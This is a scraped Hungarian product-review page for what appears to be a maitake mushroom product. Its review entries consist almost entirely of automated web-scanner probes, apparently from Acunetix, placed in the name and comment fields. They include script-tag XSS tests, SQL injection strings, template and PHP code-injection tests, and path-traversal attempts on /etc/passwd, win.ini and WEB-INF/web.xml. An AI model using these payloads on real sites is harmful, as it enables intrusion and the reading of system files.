%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<ScRiPt >Ljdv(9069)</ScRiPt>
ovwjfbtu 2020-08-15 19:32:23
Értékelés:
-1' OR 2+738-738-1=0+0+0+1 or 'ydcsSKGP'='
ovwjfbtu 2020-08-15 19:32:20
Értékelés:
-1' OR 2+205-205-1=0+0+0+1 --
ovwjfbtu 2020-08-15 19:32:16
Értékelés:
-1 OR 2+870-870-1=0+0+0+1
ffrnnktk 2020-08-15 19:32:14
Értékelés:
{{9999401*9999448}}
ovwjfbtu 2020-08-15 19:32:12
Értékelés:
-1 OR 2+299-299-1=0+0+0+1 --
ovwjfbtu 2020-08-15 19:32:08
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!
ovwjfbtu 2020-08-15 19:31:58
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!
ovwjfbtu 2020-08-15 19:31:53
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!
ffrnnktk 2020-08-15 19:31:41
Értékelés:
CWS000x
ffrnnktk 2020-08-15 19:30:47
Értékelés:
acux6499
ffrnnktk 2020-08-15 19:30:25
Értékelés:
acu8694<s1﹥s2ʺs3ʹuca8694
ffrnnktk 2020-08-15 19:30:09
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!9571487
fhekefgb 2020-08-15 19:30:02
Értékelés:
fhekefgb 2020-08-15 19:29:54
Értékelés:
ffrnnktk 2020-08-15 19:29:51
Értékelés:
'"()&%<acx><ScRiPt >Ljdv(9935)</ScRiPt>
fhekefgb 2020-08-15 19:29:50
Értékelés:
JyI=
fhekefgb 2020-08-15 19:29:48
Értékelés:
@@G0YJI
fhekefgb 2020-08-15 19:29:46
Értékelés:
1
ffrnnktk 2020-08-15 19:29:45
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!'"()&%<acx><ScRiPt >Ljdv(9746)</ScRiPt>
fhekefgb 2020-08-15 19:29:42
Értékelés:
\
fhekefgb 2020-08-15 19:29:40
Értékelés:
1'"
fhekefgb 2020-08-15 19:29:38
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!
WEB-INF\web.xml 2020-08-15 19:29:29
Értékelés:
Írj véleményt a termékről!
WEB-INF/web.xml 2020-08-15 19:29:26
Értékelés:
Írj véleményt a termékről!
mapevhqk 2020-08-15 19:29:14
Értékelés:
Írj véleményt a termékről!
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini 2020-08-15 19:28:52
Értékelés:
Írj véleményt a termékről!
..\..\..\..\..\..\..\..\windows\win.ini 2020-08-15 19:28:47
Értékelés:
Írj véleményt a termékről!
................windowswin.ini 2020-08-15 19:28:44
Értékelés:
Írj véleményt a termékről!
fhekefgb 2020-08-15 19:28:39
Értékelés:
Írj véleményt a termékről!
../../../../../../../../../../windows/win.ini.jpg 2020-08-15 19:28:34
Értékelés:
Írj véleményt a termékről!
optkkmww 2020-08-15 19:28:31
Értékelés:
Írj véleményt a termékről!
C:\WINDOWS\system32\drivers\etc\hosts 2020-08-15 19:28:30
Értékelés:
Írj véleményt a termékről!
../../../../../../../../../../windows/win.ini 2020-08-15 19:28:26
Értékelés:
Írj véleményt a termékről!
{{9999194*9999160}} 2020-08-15 19:28:24
Értékelés:
Írj véleményt a termékről!
WEB-INF\web.xml 2020-08-15 19:28:23
Értékelés:
Írj véleményt a termékről!
/WEB-INF/web.xml 2020-08-15 19:28:14
Értékelés:
Írj véleményt a termékről!
WEB-INF/web.xml 2020-08-15 19:28:11
Értékelés:
Írj véleményt a termékről!
acux2141 2020-08-15 19:28:10
Értékelés:
Írj véleményt a termékről!
/\../\../\../\../\../\../\../etc/passwd 2020-08-15 19:28:09
Értékelés:
Írj véleményt a termékről!
fhekefgb 2020-08-15 19:28:09
Értékelés:
Írj véleményt a termékről!
ovwjfbtu 2020-08-15 19:28:06
Értékelés:
Írj véleményt a termékről!
2020-08-15 19:28:05
Értékelés:
Írj véleményt a termékről!
file:///etc/passwd 2020-08-15 19:28:03
Értékelés:
Írj véleményt a termékről!
ovwjfbtu 2020-08-15 19:28:00
Értékelés:
Írj véleményt a termékről!
acu8105<s1﹥s2ʺs3ʹuca8105 2020-08-15 19:28:00
Értékelés:
Írj véleményt a termékről!
2020-08-15 19:27:58
Értékelés:
Írj véleményt a termékről!
.. 2020-08-15 19:27:56
Értékelés:
Írj véleményt a termékről!
JyI= 2020-08-15 19:27:55
Értékelés:
Írj véleményt a termékről!
sqlysgrj9398502 2020-08-15 19:27:52
Értékelés:
Írj véleményt a termékről!
@@YXlIM 2020-08-15 19:27:52
Értékelés:
Írj véleményt a termékről!
1 2020-08-15 19:27:49
Értékelés:
Írj véleményt a termékről!
\ 2020-08-15 19:27:46
Értékelés:
Írj véleményt a termékről!
mmtbipnw 2020-08-15 19:27:46
Értékelés:
maitake---grifola-frondosa/.
mmtbipnw 2020-08-15 19:27:44
Értékelés:
maitake---grifola-frondosa
sqlysgrj'"()&% 2020-08-15 19:27:44
Értékelés:
Írj véleményt a termékről!
1'" 2020-08-15 19:27:44
Értékelés:
Írj véleményt a termékről!
%2fetc%2fpasswd 2020-08-15 19:27:42
Értékelés:
Írj véleményt a termékről!
fhekefgb 2020-08-15 19:27:41
Értékelés:
Írj véleményt a termékről!
mmtbipnw 2020-08-15 19:27:39
Értékelés:
maitake---grifola-frondosa
iionrele 2020-08-15 19:27:39
Értékelés:
<!--
mmtbipnw 2020-08-15 19:27:36
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!
fhekefgb 2020-08-15 19:27:36
Értékelés:
Írj véleményt a termékről!
/etc/passwd 2020-08-15 19:27:35
Értékelés:
Írj véleményt a termékről!
fhekefgb 2020-08-15 19:27:33
Értékelés:
Írj véleményt a termékről!
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd 2020-08-15 19:27:33
Értékelés:
Írj véleményt a termékről!
iionrele 2020-08-15 19:27:33
Értékelés:
'"
sqlysgrj 2020-08-15 19:27:33
Értékelés:
Írj véleményt a termékről!
fhekefgb 2020-08-15 19:27:30
Értékelés:
Írj véleményt a termékről!
sqlysgrj 2020-08-15 19:27:28
Értékelés:
Írj véleményt a termékről!
fhekefgb 2020-08-15 19:27:27
Értékelés:
Írj véleményt a termékről!
../../../../../../../../../../etc/passwd.jpg 2020-08-15 19:27:26
Értékelés:
Írj véleményt a termékről!
fhekefgb 2020-08-15 19:27:24
Értékelés:
Írj véleményt a termékről!
emxrvylv 2020-08-15 19:27:24
Értékelés:
${@print(md5(acunetix_wvs_security_test))}\
sqlysgrj 2020-08-15 19:27:23
Értékelés:
Írj véleményt a termékről!
mmtbipnw 2020-08-15 19:27:23
Értékelés:
Írj véleményt a termékről!
emxrvylv 2020-08-15 19:27:23
Értékelés:
${@print(md5(acunetix_wvs_security_test))}
xufylyvi 2020-08-15 19:27:21
Értékelés:
Írj véleményt a termékről!
fhekefgb 2020-08-15 19:27:21
Értékelés:
Írj véleményt a termékről!
../../../../../../../../../../etc/passwd 2020-08-15 19:27:20
Értékelés:
Írj véleményt a termékről!
emxrvylv 2020-08-15 19:27:20
Értékelés:
";print(md5(acunetix_wvs_security_test));$a="
emxrvylv 2020-08-15 19:27:19
Értékelés:
';print(md5(acunetix_wvs_security_test));$a='
xufylyvi 2020-08-15 19:27:19
Értékelés:
Írj véleményt a termékről!
fhekefgb 2020-08-15 19:27:19
Értékelés:
Írj véleményt a termékről!